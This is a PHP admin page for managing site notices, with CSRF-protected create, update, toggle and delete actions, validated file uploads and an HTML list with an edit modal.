Editing: notice.php
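<?php
/*******************************
 * Admin > Notices (CRUD + File Upload + NEW badge)
 *
 * State-changing actions (create, update, toggle, delete) are accepted only
 * as POST requests carrying the session CSRF token. Uploaded files are
 * checked by extension and, where fileinfo is available, by detected content
 * type before being stored under /uploads/notices/.
 *******************************/
include 'secure_session.php';
include 'includes/auth.php';
require_once '../config.php';
// NOTE(review): header.php is included before the redirecting actions below.
// If it emits output, header('Location: ...') only works while output
// buffering is active - confirm, or move this include below the actions.
include 'includes/header.php';

/* -------------------------------------------------
   Error reporting
   Errors are logged, not displayed: on-page error output discloses file
   paths and SQL details to whoever can reach this page.
--------------------------------------------------*/
ini_set('display_errors', '0');
ini_set('display_startup_errors', '0');
ini_set('log_errors', '1');
error_reporting(E_ALL);
if (function_exists('mysqli_report')) {
    // Make mysqli throw on failure so a failed query is not silently ignored.
    mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
}

/* -------------------------------------------------
   Polyfills / helpers
--------------------------------------------------*/
if (!function_exists('str_starts_with')) {
    /**
     * Polyfill for PHP < 8. Like the native function, an empty needle matches.
     */
    function str_starts_with($haystack, $needle)
    {
        return strncmp($haystack, $needle, strlen($needle)) === 0;
    }
}

/**
 * Read a POST field as a trimmed string.
 *
 * Returns '' when the field is missing or is not a string (for example an
 * array sent as field[]), so later string functions never receive an array.
 */
function notice_post_str(string $key): string
{
    $value = $_POST[$key] ?? '';
    return is_string($value) ? trim($value) : '';
}

/**
 * Accept a date only in strict YYYY-MM-DD form; anything else becomes NULL.
 */
function notice_date(string $value): ?string
{
    if ($value === '') {
        return null;
    }
    $parsed = DateTime::createFromFormat('!Y-m-d', $value);
    // Round-trip comparison rejects overflow dates such as 2025-02-31.
    return ($parsed !== false && $parsed->format('Y-m-d') === $value) ? $value : null;
}

/**
 * Return the URL only if its scheme is http or https, otherwise ''.
 *
 * The value ends up in an href attribute. HTML escaping does not neutralise
 * script-bearing schemes there, so the scheme itself is allow-listed.
 */
function notice_http_url(string $url): string
{
    if ($url === '') {
        return '';
    }
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    return ($scheme === 'http' || $scheme === 'https') ? $url : '';
}

/**
 * Delete a stored notice file, but only if it resolves inside /uploads/notices/.
 *
 * @param string|null $publicPath Public path such as "/uploads/notices/xyz.pdf".
 */
function safe_unlink_notice_path(?string $publicPath): void
{
    if (!$publicPath) {
        return;
    }

    $base        = realpath(__DIR__ . '/..');
    $allowedRoot = realpath(__DIR__ . '/../uploads/notices');
    if ($base === false || $allowedRoot === false) {
        return;
    }

    // Resolve symlinks and ".." segments BEFORE comparing against the allowed
    // root. A path that does not resolve has nothing to delete.
    $real = realpath($base . $publicPath);
    if ($real === false || !is_file($real)) {
        return;
    }

    // The trailing separator stops a sibling such as ".../notices_old/x" matching.
    if (!str_starts_with($real, $allowedRoot . DIRECTORY_SEPARATOR)) {
        return;
    }

    // Best effort: a failed delete must not abort the request, but it is logged.
    if (!unlink($real)) {
        error_log('notice.php: could not delete ' . $real);
    }
}

/* -------------------------------------------------
   Auto-migrate table/column (compatible MySQL)
--------------------------------------------------*/
$conn->query("CREATE TABLE IF NOT EXISTS notices (
  id INT AUTO_INCREMENT PRIMARY KEY,
  title VARCHAR(255) NOT NULL,
  url VARCHAR(500) DEFAULT NULL,
  file_path VARCHAR(500) DEFAULT NULL,
  starts_on DATE NULL,
  ends_on DATE NULL,
  is_active TINYINT(1) NOT NULL DEFAULT 1,
  created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4");

$needFilePath = true;
$res = $conn->query("SHOW COLUMNS FROM notices LIKE 'file_path'");
if ($res && $res->num_rows > 0) {
    $needFilePath = false;
}
if ($needFilePath) {
    // Avoids "ADD COLUMN IF NOT EXISTS" (unsupported on some MySQL versions)
    $conn->query("ALTER TABLE notices ADD COLUMN file_path VARCHAR(500) NULL AFTER url");
}

/* -------------------------------------------------
   CSRF
--------------------------------------------------*/
if (empty($_SESSION['csrf'])) {
    $_SESSION['csrf'] = bin2hex(random_bytes(16));
}
$CSRF = $_SESSION['csrf'];

/**
 * Abort with HTTP 400 unless the posted token matches the session token.
 *
 * An empty or missing session token never validates, and the comparison is
 * constant-time.
 */
function check_csrf(): void
{
    $sent     = $_POST['csrf'] ?? '';
    $expected = $_SESSION['csrf'] ?? '';

    $valid = is_string($sent)
        && is_string($expected)
        && $expected !== ''
        && hash_equals($expected, $sent);

    if (!$valid) {
        http_response_code(400);
        die('Invalid CSRF token.');
    }
}

/* -------------------------------------------------
   Upload helper
--------------------------------------------------*/
/**
 * Store an uploaded notice attachment under /uploads/notices/.
 *
 * @param string      $field   Name of the file input in $_FILES.
 * @param string|null $oldPath Public path of the file being replaced; it is
 *                             deleted once the new file has been stored.
 * @return string|null Public path of the stored file, or null when nothing
 *                     was uploaded or the upload was rejected.
 */
function handle_notice_upload(string $field, ?string $oldPath = null): ?string
{
    if (empty($_FILES[$field]) || !is_array($_FILES[$field])) {
        return null;
    }
    $f = $_FILES[$field];

    // Reject malformed entries and multi-file submissions (field[] makes
    // every member an array).
    if (!isset($f['error'], $f['name'], $f['tmp_name'], $f['size']) || is_array($f['error'])) {
        return null;
    }
    if ($f['error'] !== UPLOAD_ERR_OK) { // also covers UPLOAD_ERR_NO_FILE
        return null;
    }

    $max = 10 * 1024 * 1024; // 10 MB
    if ($f['size'] > $max) {
        return null;
    }

    // Extension allow-list, each with the content types accepted for it.
    $allowed = [
        'pdf'  => ['application/pdf'],
        'doc'  => ['application/msword', 'application/vnd.ms-office', 'application/x-ole-storage', 'application/CDFV2'],
        'docx' => ['application/vnd.openxmlformats-officedocument.wordprocessingml.document', 'application/zip', 'application/octet-stream'],
        'jpg'  => ['image/jpeg'],
        'jpeg' => ['image/jpeg'],
        'png'  => ['image/png'],
    ];

    $ext = strtolower(pathinfo($f['name'], PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        return null;
    }

    // The extension is client-controlled, so also check what the bytes look
    // like. Falls back to the extension check alone when fileinfo is missing.
    if (class_exists('finfo')) {
        $mime = (new finfo(FILEINFO_MIME_TYPE))->file($f['tmp_name']);
        if ($mime === false || !in_array($mime, $allowed[$ext], true)) {
            return null;
        }
    }

    $base = realpath(__DIR__ . '/..');
    if ($base === false) {
        return null;
    }
    $dir = $base . '/uploads/notices';
    if (!is_dir($dir) && !mkdir($dir, 0775, true) && !is_dir($dir)) {
        return null;
    }

    // Dots are replaced as well, so the stored name carries exactly one
    // extension - the allow-listed one - and the random suffix makes it
    // unguessable and collision-free.
    // NOTE(review): the web server should additionally be configured not to
    // execute scripts under /uploads/ - confirm.
    $stem = (string) preg_replace('/[^a-zA-Z0-9_-]/', '_', pathinfo($f['name'], PATHINFO_FILENAME));
    $stem = substr($stem, 0, 100);
    if ($stem === '') {
        $stem = 'file';
    }
    $name   = $stem . '_' . bin2hex(random_bytes(4)) . '.' . $ext;
    $abs    = $dir . '/' . $name;
    $public = '/uploads/notices/' . $name;

    // move_uploaded_file() itself refuses anything that is not a genuine upload.
    if (!move_uploaded_file($f['tmp_name'], $abs)) {
        return null;
    }

    // If replacing an old file, remove it
    if ($oldPath && str_starts_with($oldPath, '/uploads/notices/')) {
        safe_unlink_notice_path($oldPath);
    }
    return $public;
}

/* -------------------------------------------------
   Actions (POST only; a GET link must never change state)
--------------------------------------------------*/
$isPost       = (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST');
$postedAction = $_POST['action'] ?? '';
$action       = ($isPost && is_string($postedAction)) ? $postedAction : '';

if ($action === 'create') {
    check_csrf();
    $title     = notice_post_str('title');
    $url       = notice_http_url(notice_post_str('url'));
    $starts_on = notice_date(notice_post_str('starts_on'));
    $ends_on   = notice_date(notice_post_str('ends_on'));
    $is_active = isset($_POST['is_active']) ? 1 : 0;

    if ($title !== '') {
        // Upload only once the notice is known to be saved, so a rejected
        // form does not leave an orphaned file behind.
        // When no file was given, store an empty string "" instead of NULL.
        $file_path = handle_notice_upload('notice_file', null) ?? '';

        $stmt = $conn->prepare("INSERT INTO notices (title, url, file_path, starts_on, ends_on, is_active) VALUES (?,?,?,?,?,?)");
        //                 s  s  s  s  s  i
        $stmt->bind_param('sssssi', $title, $url, $file_path, $starts_on, $ends_on, $is_active);
        $stmt->execute();
        $stmt->close();
    }
    header('Location: notice.php?msg=created');
    exit;
}

if ($action === 'update') {
    check_csrf();
    $id        = (int) ($_POST['id'] ?? 0);
    $title     = notice_post_str('title');
    $url       = notice_http_url(notice_post_str('url'));
    $starts_on = notice_date(notice_post_str('starts_on'));
    $ends_on   = notice_date(notice_post_str('ends_on'));
    $is_active = isset($_POST['is_active']) ? 1 : 0;
    $remove    = isset($_POST['remove_file']);

    if ($id > 0 && $title !== '') {
        // $id is an int cast, so interpolating it cannot alter the statement.
        $cur = $conn->query("SELECT file_path FROM notices WHERE id = {$id}")->fetch_assoc();

        // Only touch files when the row really exists.
        if ($cur !== null) {
            $old = $cur['file_path'] ?? null;

            // If user ticked "Remove existing file", delete it
            if ($remove && $old) {
                safe_unlink_notice_path($old);
                $old = null;
            }

            // If a new file uploaded, it will replace; pass $old only if not already removed
            $new = handle_notice_upload('notice_file', ($remove ? null : $old));

            // Save final value: uploaded path > keep old > empty string.
            // Never send NULL here; an empty string is stored instead.
            $save = ($new !== null) ? $new : ($remove ? '' : ($old ?? ''));

            $stmt = $conn->prepare("UPDATE notices SET title=?, url=?, file_path=?, starts_on=?, ends_on=?, is_active=? WHERE id=?");
            //                 s  s  s  s  s  i  i
            $stmt->bind_param('sssssii', $title, $url, $save, $starts_on, $ends_on, $is_active, $id);
            $stmt->execute();
            $stmt->close();
        }
    }
    header('Location: notice.php?msg=updated');
    exit;
}

if ($action === 'toggle') {
    check_csrf();
    $id = (int) ($_POST['id'] ?? 0);
    if ($id > 0) {
        $conn->query("UPDATE notices SET is_active = 1 - is_active WHERE id = {$id}");
    }
    header('Location: notice.php?msg=toggled');
    exit;
}

if ($action === 'delete') {
    check_csrf();
    $id = (int) ($_POST['id'] ?? 0);
    if ($id > 0) {
        $cur = $conn->query("SELECT file_path FROM notices WHERE id = {$id}")->fetch_assoc();
        if (!empty($cur['file_path'])) {
            safe_unlink_notice_path($cur['file_path']);
        }
        $conn->query("DELETE FROM notices WHERE id = {$id}");
    }
    header('Location: notice.php?msg=deleted');
    exit;
}

/* -------------------------------------------------
   Fetch
--------------------------------------------------*/
$rows = [];
if ($res = $conn->query("SELECT * FROM notices ORDER BY created_at DESC")) {
    while ($r = $res->fetch_assoc()) {
        $rows[] = $r;
    }
}

// Only the messages this page itself redirects with are echoed back.
$flash = $_GET['msg'] ?? '';
if (!is_string($flash) || !in_array($flash, ['created', 'updated', 'toggled', 'deleted'], true)) {
    $flash = '';
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <title>Manage Notices</title>
  <style>
    .page-title{color:#0409B0;font-weight:800;letter-spacing:.3px}
    .card-soft{border:none;border-radius:14px;background:#eef1ff;box-shadow:0 6px 18px rgba(0,0,0,.08)}
    .table td,.table th{vertical-align:middle}
    .badge.on{background:#064e3b;color:#34d399;}
    .badge.off{background:#4b1b1b;color:#fca5a5;}
    .blink-new{background:#ff0066;color:#fff;border-radius:6px;padding:2px 6px;font-size:11px;font-weight:700;animation:newBlink 1s steps(2,start) infinite;margin-left:8px}
    @keyframes newBlink{50%{opacity:.15}}
  </style>
</head>
<body>
<div class="container my-4">
  <div class="d-flex align-items-center justify-content-between mb-3">
    <h3 class="page-title mb-0"><i class="fas fa-bullhorn mr-2"></i>Manage Notices</h3>
    <a href="dashboard.php" class="btn btn-light"><i class="fas fa-arrow-left mr-1"></i> Back to Dashboard</a>
  </div>

  <?php if ($flash !== ''): ?>
    <div class="alert alert-success py-2"><?php echo htmlspecialchars($flash, ENT_QUOTES, 'UTF-8'); ?></div>
  <?php endif; ?>

  <!-- Create -->
  <div class="card card-soft mb-4">
    <div class="card-body">
      <h5 class="mb-3"><i class="fas fa-plus mr-2"></i>Add Notice</h5>
      <form method="post" class="row" enctype="multipart/form-data">
        <input type="hidden" name="action" value="create">
        <input type="hidden" name="csrf" value="<?php echo htmlspecialchars($CSRF, ENT_QUOTES, 'UTF-8'); ?>">
        <div class="form-group col-md-6">
          <label>Title <span class="text-danger">*</span></label>
          <input class="form-control" name="title" required placeholder="e.g., Admission open for 2025-26">
        </div>
        <div class="form-group col-md-6">
          <label>Optional URL</label>
          <input class="form-control" name="url" type="url" placeholder="https://example.com/details">
        </div>
        <div class="form-group col-md-6">
          <label>Attach File (PDF/Doc/Image)</label>
          <input class="form-control" type="file" name="notice_file" accept=".pdf,.doc,.docx,.jpg,.jpeg,.png">
          <small class="text-muted">Max 10 MB. If both URL &amp; file are given, file link is used.</small>
        </div>
        <div class="form-group col-md-3">
          <label>Starts On</label>
          <input class="form-control" name="starts_on" type="date">
        </div>
        <div class="form-group col-md-3">
          <label>Ends On</label>
          <input class="form-control" name="ends_on" type="date">
        </div>
        <div class="form-group col-md-3 d-flex align-items-center">
          <div class="custom-control custom-checkbox mt-4">
            <input type="checkbox" class="custom-control-input" id="createActive" name="is_active" checked>
            <label class="custom-control-label" for="createActive">Active</label>
          </div>
        </div>
        <div class="form-group col-md-12">
          <button class="btn btn-primary" style="background:#0409B0;border-color:#0409B0;">Save Notice</button>
        </div>
      </form>
    </div>
  </div>

  <!-- List -->
  <div class="card card-soft">
    <div class="card-body">
      <h5 class="mb-3"><i class="fas fa-list mr-2"></i>All Notices</h5>
      <div class="table-responsive">
        <table class="table table-sm">
          <thead class="thead-light">
            <tr>
              <th style="width:60px">ID</th>
              <th>Title</th>
              <th style="width:120px">Starts</th>
              <th style="width:120px">Ends</th>
              <th style="width:100px">Status</th>
              <th style="width:220px">Actions</th>
            </tr>
          </thead>
          <tbody>
          <?php if (empty($rows)): ?>
            <tr><td colspan="6" class="text-muted">No notices yet.</td></tr>
          <?php else: foreach ($rows as $r): ?>
            <?php
              // Determine "new" by starts_on (if present) else created_at
              $publish  = !empty($r['starts_on']) ? $r['starts_on'] : ($r['created_at'] ?? null);
              $is_new   = $publish ? (strtotime($publish) >= strtotime('-15 days')) : false;

              $id       = (int) $r['id'];
              $title    = htmlspecialchars($r['title'], ENT_QUOTES, 'UTF-8');
              $starts   = htmlspecialchars($r['starts_on'] ?? '', ENT_QUOTES, 'UTF-8');
              $ends     = htmlspecialchars($r['ends_on'] ?? '', ENT_QUOTES, 'UTF-8');
              $isActive = !empty($r['is_active']);
              // Rows saved before URL validation existed are filtered here too:
              // a stored URL is linked only when its scheme is http(s).
              $link     = !empty($r['file_path'])
                        ? $r['file_path']
                        : notice_http_url((string) ($r['url'] ?? ''));
            ?>
            <tr>
              <td><?php echo $id; ?></td>
              <td>
                <div class="font-weight-bold">
                  <?php echo $title; ?>
                  <?php if ($is_new): ?><span class="blink-new">NEW</span><?php endif; ?>
                </div>
                <?php if ($link): ?>
                  <div>
                    <a target="_blank" rel="noopener noreferrer" href="<?php echo htmlspecialchars($link, ENT_QUOTES, 'UTF-8'); ?>">
                      <?php echo !empty($r['file_path']) ? 'Download file' : 'Open link'; ?>
                    </a>
                  </div>
                <?php endif; ?>
              </td>
              <td><?php echo $starts; ?></td>
              <td><?php echo $ends; ?></td>
              <td><?php echo $isActive ? '<span class="badge on">Active</span>' : '<span class="badge off">Inactive</span>'; ?></td>
              <td>
                <?php /* The JSON_HEX_* flags escape < > ' " & so the JSON is safe inside this single-quoted attribute. */ ?>
                <button type="button" class="btn btn-sm btn-outline-secondary mr-1"
                        onclick='editNotice(<?php echo $id; ?>, <?php echo json_encode($r, JSON_HEX_TAG|JSON_HEX_APOS|JSON_HEX_QUOT|JSON_HEX_AMP); ?>)'>
                  <i class="fas fa-edit"></i> Edit
                </button>
                <form method="post" class="d-inline">
                  <input type="hidden" name="action" value="toggle">
                  <input type="hidden" name="id" value="<?php echo $id; ?>">
                  <input type="hidden" name="csrf" value="<?php echo htmlspecialchars($CSRF, ENT_QUOTES, 'UTF-8'); ?>">
                  <button type="submit" class="btn btn-sm btn-outline-primary mr-1">
                    <i class="fas fa-toggle-on"></i> Toggle
                  </button>
                </form>
                <form method="post" class="d-inline" onsubmit="return confirm('Delete this notice?');">
                  <input type="hidden" name="action" value="delete">
                  <input type="hidden" name="id" value="<?php echo $id; ?>">
                  <input type="hidden" name="csrf" value="<?php echo htmlspecialchars($CSRF, ENT_QUOTES, 'UTF-8'); ?>">
                  <button type="submit" class="btn btn-sm btn-outline-danger">
                    <i class="fas fa-trash"></i> Delete
                  </button>
                </form>
              </td>
            </tr>
          <?php endforeach; endif; ?>
          </tbody>
        </table>
      </div>
    </div>
  </div>
</div>

<!-- Edit Modal -->
<div class="modal fade" id="editModal" tabindex="-1" role="dialog" aria-labelledby="editTitle" aria-hidden="true">
  <div class="modal-dialog modal-dialog-centered" role="document">
    <form class="modal-content" method="post" enctype="multipart/form-data">
      <input type="hidden" name="action" value="update">
      <input type="hidden" name="id" id="edit_id">
      <input type="hidden" name="csrf" value="<?php echo htmlspecialchars($CSRF, ENT_QUOTES, 'UTF-8'); ?>">
      <div class="modal-header">
        <h5 class="modal-title" id="editTitle"><i class="fas fa-edit mr-1"></i> Edit Notice</h5>
        <button type="button" class="close" data-dismiss="modal"><span>&times;</span></button>
      </div>
      <div class="modal-body">
        <div class="form-group">
          <label>Title *</label>
          <input class="form-control" name="title" id="edit_title" required>
        </div>
        <div class="form-group">
          <label>URL</label>
          <input class="form-control" name="url" id="edit_url" type="url">
        </div>
        <div class="form-row">
          <div class="form-group col-6">
            <label>Starts On</label>
            <input class="form-control" name="starts_on" id="edit_starts" type="date">
          </div>
          <div class="form-group col-6">
            <label>Ends On</label>
            <input class="form-control" name="ends_on" id="edit_ends" type="date">
          </div>
        </div>
        <div class="form-group">
          <label>Replace File</label>
          <input class="form-control" type="file" name="notice_file" id="edit_file" accept=".pdf,.doc,.docx,.jpg,.jpeg,.png">
          <div class="custom-control custom-checkbox mt-2">
            <input type="checkbox" class="custom-control-input" id="remove_file" name="remove_file">
            <label class="custom-control-label" for="remove_file">Remove existing file</label>
          </div>
        </div>
        <div class="custom-control custom-checkbox">
          <input type="checkbox" class="custom-control-input" id="edit_active" name="is_active">
          <label class="custom-control-label" for="edit_active">Active</label>
        </div>
      </div>
      <div class="modal-footer">
        <button class="btn btn-primary" style="background:#0409B0;border-color:#0409B0;">Save Changes</button>
      </div>
    </form>
  </div>
</div>

<script>
// Fill the edit modal from the row data and open it.
function editNotice(id, data){
  document.getElementById('edit_id').value = id;
  document.getElementById('edit_title').value = data.title || '';
  document.getElementById('edit_url').value = data.url || '';
  document.getElementById('edit_starts').value = data.starts_on || '';
  document.getElementById('edit_ends').value = data.ends_on || '';
  document.getElementById('edit_active').checked = (parseInt(data.is_active, 10) === 1);
  // Clear per-notice choices so a tick or file picked for a previously
  // opened notice is not submitted for this one.
  document.getElementById('remove_file').checked = false;
  document.getElementById('edit_file').value = '';
  $('#editModal').modal('show');
}
</script>
<?php include 'includes/footer.php'; ?>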